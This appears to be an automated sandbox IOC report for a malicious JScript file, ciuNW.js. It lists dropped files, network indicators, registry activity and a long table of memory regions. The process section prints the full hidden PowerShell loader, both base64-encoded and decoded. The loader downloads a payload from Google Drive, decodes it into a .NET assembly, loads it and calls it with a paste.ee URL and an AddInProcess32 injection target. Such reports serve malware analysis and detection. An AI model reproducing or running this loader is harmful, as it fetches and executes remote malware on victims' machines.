IOC Report
ciuNW.js

loading gif

Files

File Path
Type
Category
Malicious
ciuNW.js
Unicode text, UTF-8 text, with very long lines (560), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csghtoxn.pz0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddhq1wuc.4nb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgre2jf3.srw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soohqr0e.ujc.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ciuNW.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SQBFAFgAKAAgACgAKAAnAFQAMgBIAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABaADQAUwBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAJwArACcAaABCAFkAdwB1AHIAIABaADQAUwA7AFQAMgBIAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgACcAKwAnAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQAnACsAJwBuAHQAOwBUADIASABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAMgAnACsAJwBIAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUADIASABpAG0AYQBnAGUAVQByAGwAKQA7AFQAMgBIAGkAbQBhACcAKwAnAGcAZQBUAGUAeAAnACsAJwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAJwArACcAcgBpAG4AZwAoAFQAMgBIAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAMgBIAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAFMAJwArACcAVABBAFIAVAA+AD4AWgA0AFMAOwAnACsAJwBUADIASABlAG4AZABGAGwAYQBnACAAPQAgAFoANABTADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBaACcAKwAnADQAJwArACcAUwA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVAAyAEgAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVAAyAEgAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAMgBIAGUAbgBkAEkAbgBkACcAKwAnAGUAeAAgAD0AIABUADIASABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkACcAKwAnAGUAeABPAGYAKABUADIASABlAG4AZABGAGwAYQBnACkAOwBUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACAALQAnACsAJwBnAGUAIAAwACAALQBhAG4AZAAgAFQAMgBIAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVAAyAEgAcwB0AGEAcgB0AEkAbgBkACcAKwAnAGUAeAA7AFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAnACsAJwBUADIASABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVAAyAEgAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACcAKwAnACAAVAAyAEgAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAMgBIAHMAdABhAHIAdABJAG4AZABlAHgAOwBUADIASABiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAFQAMgBIAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUADIASABzAHQAYQByAHQASQBuAGQAZQB4ACwAIABUADIASABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVAAyAEgAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABWAEcAcQAgAEYAbwAnACsAJwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABUADIASABfACAAfQApAFsALQAnACsAJwAxACcAKwAnAC4ALgAtACgAVAAyAEgAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AFQAMgBIAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0AJwArACcALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAJwArACcAaQBuAGcAKABUADIASABiAGEAcwBlADYANABSAGUAdgBlACcAKwAnAHIAcwBlAGQAKQA7AFQAMgBIAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAJwArACcAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAVAAyAEgAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAMgBIAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACsAJwBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABaADQAUwBWAEEASQBaADQAUwApADsAVAAyAEgAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgAnACsAJwBvAGsAZQAoAFQAMgBIAG4AdQBsAGwALAAgAEAAKABaADQAUwAwAC8ANABLAHoAJwArACcAegB1AC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAWgA0AFMAJwArACcALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALAAgAFoANABTAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBaADQAJwArACcAUwAsACAAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAbwBaADQAUwAsACAAWgA0AFMAZABlAHMAYQB0ACcAKwAnAGkAdgBhAGQAbwBaADQAUwAnACsAJwAsAFoANABTAGQAJwArACcAZQAnACsAJwBzAGEAdABpAHYAYQAnACsAJwBkAG8AWgA0AFMALABaADQAJwArACcAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMALABaADQAUwBkAGUAcwBhAHQAaQB2AGEAZABvAFoANABTACwAWgA0AFMAMQBaADQAUwAsAFoANABTAGQAZQBzAGEAdABpAHYAYQBkAG8AWgA0AFMAKQApADsAJwApACAALQBDAHIAZQBQAGwAYQBDAEUAIAAgACcAVAAyAEgAJwAsAFsAQwBoAGEAUgBdADMANgAtAFIAZQBQAGwAQQBjAEUAIAAgACcAWgA0AFMAJwAsAFsAQwBoAGEAUgBdADMAOQAgAC0AQwByAGUAUABsAGEAQwBFACcAVgBHAHEAJwAsAFsAQwBoAGEAUgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX( (('T2HimageUrl = Z4Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur Z4S;T2HwebClient = '+'New-Object System.Net.WebClie'+'nt;T2HimageBytes = T2'+'HwebClient.DownloadData(T2HimageUrl);T2Hima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetSt'+'ring(T2HimageBytes);T2HstartFlag = Z4S<<BASE64_S'+'TART>>Z4S;'+'T2HendFlag = Z4S<<BASE64_END>>Z'+'4'+'S;T2HstartIndex = T2HimageText.IndexOf(T2HstartFlag);T2HendInd'+'ex = T2HimageText.Ind'+'exOf(T2HendFlag);T2HstartIndex -'+'ge 0 -and T2HendIndex -gt T2HstartInd'+'ex;T2HstartIndex += '+'T2HstartFlag.Length;T2Hbase64Length ='+' T2HendIndex - T2HstartIndex;T2Hbas'+'e64Command = T2HimageText.Substring(T2HstartIndex, T2Hbase64Length);T2Hbase64Reversed = -join (T2Hbase64Command.'+'ToCharArray() VGq Fo'+'rEach-Object { T2H_ })[-'+'1'+'..-(T2Hbase64Command.Length)];T2HcommandBytes = [System'+'.Convert]::FromBase64Str'+'ing(T2Hbase64Reve'+'rsed);T2HloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(T2HcommandBytes);T2HvaiMethod = [dnlib.IO.Home'+'].GetMethod(Z4SVAIZ4S);T2HvaiMethod.Inv'+'oke(T2Hnull, @(Z4S0/4Kz'+'zu/d/ee.etsap//:sptthZ4S'+', Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SdesativadoZ4S, Z4SAddInProcess32Z4'+'S, Z4SdesativadoZ4S, Z4Sdesat'+'ivadoZ4S'+',Z4Sd'+'e'+'sativa'+'doZ4S,Z4'+'SdesativadoZ4S,Z4Sdesativad'+'oZ4S,Z4SdesativadoZ4S,Z4SdesativadoZ4S,Z4S1Z4S,Z4SdesativadoZ4S));') -CrePlaCE 'T2H',[ChaR]36-RePlAcE 'Z4S',[ChaR]39 -CrePlaCE'VGq',[ChaR]124))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://drive.google.com
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.google.com
unknown
https://aka.ms/pscore6
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
172.217.16.206
drive.usercontent.google.com
142.250.185.97

IPs

IP
Domain
Country
Malicious
172.217.16.206
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFD9BA90000
trusted library allocation
page read and write
1CC3D9B4000
heap
page read and write
1CC3BB72000
heap
page read and write
224E58F0000
heap
page read and write
1CC3D96E000
heap
page read and write
1CC3D960000
heap
page read and write
1CC3BB84000
heap
page read and write
1CC3D8C4000
heap
page read and write
1CC3BB84000
heap
page read and write
1CC3D8CB000
heap
page read and write
1CC3DAB1000
heap
page read and write
1CC3D93B000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1CC3D984000
heap
page read and write
179564F5000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1CC3D9E9000
heap
page read and write
1CC3D9D7000
heap
page read and write
1CC3D8C8000
heap
page read and write
468BFB8000
stack
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
17954B60000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1CC3D8E4000
heap
page read and write
1CC3BB6A000
heap
page read and write
1CC3D9AC000
heap
page read and write
388A1FE000
stack
page read and write
1CC3D9DF000
heap
page read and write
17956961000
trusted library allocation
page read and write
1CC3D87F000
heap
page read and write
224CF508000
trusted library allocation
page read and write
1CC3D993000
heap
page read and write
1CC3D890000
heap
page read and write
92C2D7E000
stack
page read and write
1CC3D99C000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1CC3D9C3000
heap
page read and write
1CC3D8B7000
heap
page read and write
1CC3B930000
heap
page read and write
1CC3D87B000
heap
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1CC3D9B8000
heap
page read and write
179568DE000
heap
page read and write
1CC3D8DE000
heap
page read and write
1CC3D9BC000
heap
page read and write
1CC3BA90000
heap
page read and write
7FFD9B782000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
17956D82000
trusted library allocation
page read and write
468BD7E000
stack
page read and write
1CC3D971000
heap
page read and write
1CC3DA8D000
heap
page read and write
1CC3D9AB000
heap
page read and write
1CC3D941000
heap
page read and write
1CC3D876000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1CC3BB79000
heap
page read and write
1CC3D996000
heap
page read and write
1CC3D9B1000
heap
page read and write
179549CB000
heap
page read and write
17956AC7000
trusted library allocation
page read and write
1CC3BB72000
heap
page read and write
1CC3D992000
heap
page read and write
224E5A12000
heap
page read and write
1796EC00000
heap
page execute and read and write
1CC3BABA000
heap
page read and write
1CC3BB74000
heap
page read and write
1CC3D966000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1CC3D887000
heap
page read and write
1CC3D9AA000
heap
page read and write
1CC3D888000
heap
page read and write
1CC3D973000
heap
page read and write
1CC3BB79000
heap
page read and write
1CC3D876000
heap
page read and write
1CC3D8DE000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
1CC3D95A000
heap
page read and write
1796EC30000
heap
page read and write
17956D93000
trusted library allocation
page read and write
224E5A7B000
heap
page read and write
224CED4A000
trusted library allocation
page read and write
1CC3D8C4000
heap
page read and write
17956EE1000
trusted library allocation
page read and write
1CC3BB8C000
heap
page read and write
1CC3D960000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1CC3D9B1000
heap
page read and write
224E582C000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3BB58000
heap
page read and write
1CC3DAA0000
heap
page read and write
1CC3BC40000
heap
page read and write
1CC3BAFE000
heap
page read and write
224CB8C0000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3BB6F000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1CC3DAA6000
heap
page read and write
1CC3D9A1000
heap
page read and write
1CC3BB82000
heap
page read and write
1CC3BA10000
heap
page read and write
388A3FE000
stack
page read and write
224E5877000
heap
page read and write
1CC3D8E4000
heap
page read and write
1CC3D94F000
heap
page read and write
224CB846000
heap
page read and write
17956380000
heap
page read and write
92C303E000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1CC3D8F2000
heap
page read and write
224CED5B000
trusted library allocation
page read and write
1CC3D985000
heap
page read and write
1CC3BB84000
heap
page read and write
1CC3D966000
heap
page read and write
38899EA000
stack
page read and write
224CED75000
trusted library allocation
page read and write
92C2CFE000
stack
page read and write
1CC3BB62000
heap
page read and write
1CC3D99E000
heap
page read and write
224CD140000
trusted library allocation
page read and write
1795692E000
heap
page read and write
17954A58000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3BB8E000
heap
page read and write
1CC3D990000
heap
page read and write
224CB6D0000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3BB74000
heap
page read and write
1CC3D893000
heap
page read and write
1CC3D99A000
heap
page read and write
388A2FF000
stack
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1CC3D990000
heap
page read and write
224CD186000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
1CC3D878000
heap
page read and write
224E5A45000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B942000
trusted library allocation
page read and write
1CC3BB7B000
heap
page read and write
1CC3DA8C000
heap
page read and write
1CC3D93F000
heap
page read and write
3889DFE000
stack
page read and write
468BA7E000
stack
page read and write
1CC3D98D000
heap
page read and write
1CC3D9E5000
heap
page read and write
17954B80000
heap
page read and write
1CC3BB82000
heap
page read and write
1CC3D9AB000
heap
page read and write
468C2BB000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1CC3D952000
heap
page read and write
468B7C3000
stack
page read and write
1CC3D9AF000
heap
page read and write
1CC3DAB0000
heap
page read and write
224CD681000
trusted library allocation
page read and write
92C3C0E000
stack
page read and write
1CC3D89C000
heap
page read and write
1CC3D99F000
heap
page read and write
1CC3D94F000
heap
page read and write
1CC3D8AE000
heap
page read and write
17956A81000
trusted library allocation
page read and write
224CB7C9000
heap
page read and write
1CC3D9A0000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1CC3D960000
heap
page read and write
1CC3D9E5000
heap
page read and write
1CC3D88B000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
224CB8E0000
heap
page read and write
1CC3BAD2000
heap
page read and write
1CC3BB6C000
heap
page read and write
1CC3BB75000
heap
page read and write
1CC3D897000
heap
page read and write
1CC3D997000
heap
page read and write
1CC3D9C0000
heap
page read and write
1CC3D8E4000
heap
page read and write
1CC3D9DB000
heap
page read and write
1CC3D8BB000
heap
page read and write
1CC3BB7A000
heap
page read and write
1CC3BB6F000
heap
page read and write
92C2FB8000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1CC3D986000
heap
page read and write
1CC3D9A7000
heap
page read and write
224CB80A000
heap
page read and write
224CB800000
heap
page read and write
1CC3D8E9000
heap
page read and write
1CC3D9A1000
heap
page read and write
1CC3D885000
heap
page read and write
468BE79000
stack
page read and write
224CD100000
trusted library allocation
page read and write
1795689A000
heap
page read and write
1CC3D957000
heap
page read and write
1CC3D9DC000
heap
page read and write
1CC3D8AF000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
1CC3D948000
heap
page read and write
224E57E8000
heap
page read and write
1CC3D9A6000
heap
page read and write
1CC3D999000
heap
page read and write
1CC3D8AE000
heap
page read and write
224E58D0000
heap
page read and write
1CC3D948000
heap
page read and write
1CC3BB7A000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
1CC3D957000
heap
page read and write
1CC3D8C8000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1CC3DA8D000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1CC3D892000
heap
page read and write
1CC3DA8C000
heap
page read and write
224E568D000
heap
page read and write
1CC3D9AA000
heap
page read and write
1CC3D8B3000
heap
page read and write
1CC3D941000
heap
page read and write
17956950000
heap
page read and write
1CC3D993000
heap
page read and write
224CD704000
trusted library allocation
page read and write
468C23E000
stack
page read and write
1CC3D89B000
heap
page read and write
1CC3D93F000
heap
page read and write
1CC3D98F000
heap
page read and write
468BC7D000
stack
page read and write
468BF37000
stack
page read and write
1CC3D8AF000
heap
page read and write
1CC3BB7A000
heap
page read and write
1CC3D995000
heap
page read and write
1CC3D8D9000
heap
page read and write
1CC3D8F2000
heap
page read and write
1CC3D8C8000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D947000
heap
page read and write
1CC3D8F2000
heap
page read and write
17956D5D000
trusted library allocation
page read and write
1CC3D9BA000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
1CC3DAA6000
heap
page read and write
17956843000
heap
page read and write
92C3C8C000
stack
page read and write
1CC3D8A7000
heap
page read and write
1CC3DA96000
heap
page read and write
1CC3D94F000
heap
page read and write
1CC3D8EC000
heap
page read and write
224CB89B000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
1CC3D9A1000
heap
page read and write
1CC3D94F000
heap
page read and write
1CC3BB75000
heap
page read and write
1CC3D8E4000
heap
page read and write
179669D5000
trusted library allocation
page read and write
1CC3D943000
heap
page read and write
1CC3D8EE000
heap
page read and write
1CC3D9DB000
heap
page read and write
224E5A5F000
heap
page read and write
1CC3BC99000
heap
page read and write
1CC3D99D000
heap
page read and write
1CC3DAA6000
heap
page read and write
1CC3D9B8000
heap
page read and write
1CC3D871000
heap
page read and write
224DD690000
trusted library allocation
page read and write
1CC3DA11000
heap
page read and write
1CC3D982000
heap
page read and write
17956898000
heap
page read and write
1CC3DA0E000
heap
page read and write
1CC3D96C000
heap
page read and write
1CC3D935000
heap
page read and write
1CC3D998000
heap
page read and write
1CC3D999000
heap
page read and write
224CD5F0000
heap
page execute and read and write
1CC3D993000
heap
page read and write
1CC3BB72000
heap
page read and write
1CC3D971000
heap
page read and write
224CB8A6000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1CC3D9E9000
heap
page read and write
17956922000
heap
page read and write
1CC3D984000
heap
page read and write
1CC3D9AD000
heap
page read and write
1CC3D959000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3BB6F000
heap
page read and write
1CC3D9AB000
heap
page read and write
1CC3D966000
heap
page read and write
1CC3D8CB000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
224E59D0000
heap
page read and write
1CC3D899000
heap
page read and write
1CC3DAB0000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1CC3BB64000
heap
page read and write
1CC3D9DB000
heap
page read and write
1CC3BB86000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D9EE000
heap
page read and write
92C30BE000
stack
page read and write
1CC3BB74000
heap
page read and write
1CC3D8F3000
heap
page read and write
1796ED10000
heap
page read and write
1CC3D8AC000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
92C2F38000
stack
page read and write
1CC3D9AB000
heap
page read and write
1CC3BAF4000
heap
page read and write
1CC3D984000
heap
page read and write
1CC3D9EE000
heap
page read and write
1CC3D9F5000
heap
page read and write
468C13F000
stack
page read and write
1CC3D99D000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3D9E2000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1CC3D8C5000
heap
page read and write
1CC3BB6D000
heap
page read and write
1CC3D9DB000
heap
page read and write
1CC3D892000
heap
page read and write
1CC3BAFE000
heap
page read and write
1CC3D898000
heap
page read and write
224CED57000
trusted library allocation
page read and write
1CC3BB8B000
heap
page read and write
1CC3D985000
heap
page read and write
1CC3D948000
heap
page read and write
1CC3DA70000
heap
page read and write
1CC3BB6A000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
224E57A0000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3D98F000
heap
page read and write
1CC3D9A8000
heap
page read and write
1CC3DA81000
heap
page read and write
1CC3D9AE000
heap
page read and write
1CC3D9AE000
heap
page read and write
1CC3D95D000
heap
page read and write
1CC3D9B3000
heap
page read and write
7FFD9B762000
trusted library allocation
page read and write
1CC3D9AA000
heap
page read and write
1CC3D8E6000
heap
page read and write
1796EC07000
heap
page execute and read and write
1CC3D9A3000
heap
page read and write
1CC3BB77000
heap
page read and write
1CC3D994000
heap
page read and write
1CC3BB6F000
heap
page read and write
1CC3D941000
heap
page read and write
1CC3D9DB000
heap
page read and write
1CC3D99D000
heap
page read and write
224DD96F000
trusted library allocation
page read and write
1CC3D9EA000
heap
page read and write
1CC3D957000
heap
page read and write
1CC3D896000
heap
page read and write
1CC3D9BF000
heap
page read and write
1796F0F0000
heap
page read and write
1CC3D8F2000
heap
page read and write
17966961000
trusted library allocation
page read and write
1CC3D87D000
heap
page read and write
92C2A7E000
stack
page read and write
17966970000
trusted library allocation
page read and write
1CC3BC99000
heap
page read and write
468C03B000
stack
page read and write
1CC3BB71000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
224E585F000
heap
page read and write
17954A5A000
heap
page read and write
1CC3D9DD000
heap
page read and write
1CC3D8C8000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3D880000
heap
page read and write
224CE2AE000
trusted library allocation
page read and write
1CC3D9EE000
heap
page read and write
1CC3BB82000
heap
page read and write
17954A0B000
heap
page read and write
1CC3D8EB000
heap
page read and write
224DD6F5000
trusted library allocation
page read and write
1CC3BB85000
heap
page read and write
1CC3DA83000
heap
page read and write
224CB7E7000
heap
page read and write
179563E0000
heap
page execute and read and write
224CD120000
trusted library allocation
page read and write
1CC3D98C000
heap
page read and write
1CC3D943000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
224E58C7000
heap
page execute and read and write
1CC3D994000
heap
page read and write
1CC3BB79000
heap
page read and write
468BBFE000
stack
page read and write
224CD5D0000
heap
page execute and read and write
1CC3D9BF000
heap
page read and write
468BAFE000
stack
page read and write
224DD838000
trusted library allocation
page read and write
224CD670000
heap
page read and write
1CC3D8A0000
heap
page read and write
1CC3D96E000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3D896000
heap
page read and write
1CC3D966000
heap
page read and write
1CC3DA96000
heap
page read and write
1CC3D973000
heap
page read and write
17954A63000
heap
page read and write
1CC3D951000
heap
page read and write
1CC3D8F3000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
224CF261000
trusted library allocation
page read and write
1CC3D8E3000
heap
page read and write
1CC3D9A4000
heap
page read and write
1CC3D99C000
heap
page read and write
1CC3D957000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3DA02000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1CC3D8F2000
heap
page read and write
224CD8AE000
trusted library allocation
page read and write
1CC3D952000
heap
page read and write
1CC3D992000
heap
page read and write
1CC3D8F0000
heap
page read and write
3889CFE000
stack
page read and write
7DF4151C0000
trusted library allocation
page execute and read and write
1CC3DA8D000
heap
page read and write
17956925000
heap
page read and write
468BEBE000
stack
page read and write
224E58C0000
heap
page execute and read and write
468C1BF000
stack
page read and write
1CC3BB67000
heap
page read and write
1CC3D8EC000
heap
page read and write
224CD0D0000
heap
page read and write
1CC3BB6C000
heap
page read and write
1CC3D9BF000
heap
page read and write
1CC3BB71000
heap
page read and write
1CC3DA96000
heap
page read and write
1CC3D960000
heap
page read and write
224DD681000
trusted library allocation
page read and write
1CC3D957000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
1CC3BB66000
heap
page read and write
1CC3D8EC000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3BB8B000
heap
page read and write
1CC3DAB0000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3D8EF000
heap
page read and write
1CC3D8F2000
heap
page read and write
179549E3000
heap
page read and write
92C2DF9000
stack
page read and write
1CC3BB8C000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1CC3D94F000
heap
page read and write
7FFD9B93A000
trusted library allocation
page read and write
224CD500000
trusted library allocation
page read and write
1CC3D8F2000
heap
page read and write
1CC3D9FE000
heap
page read and write
1CC3D8B3000
heap
page read and write
1CC3BC95000
heap
page read and write
1CC3D8AE000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3D8EB000
heap
page read and write
1CC3D974000
heap
page read and write
1CC3D89E000
heap
page read and write
1CC3D896000
heap
page read and write
1CC3D973000
heap
page read and write
224CD18A000
heap
page read and write
92C2C7E000
stack
page read and write
7FFD9B931000
trusted library allocation
page read and write
1CC3D957000
heap
page read and write
224E5806000
heap
page read and write
1CC3D9AF000
heap
page read and write
1CC3BAB9000
heap
page read and write
1CC3D939000
heap
page read and write
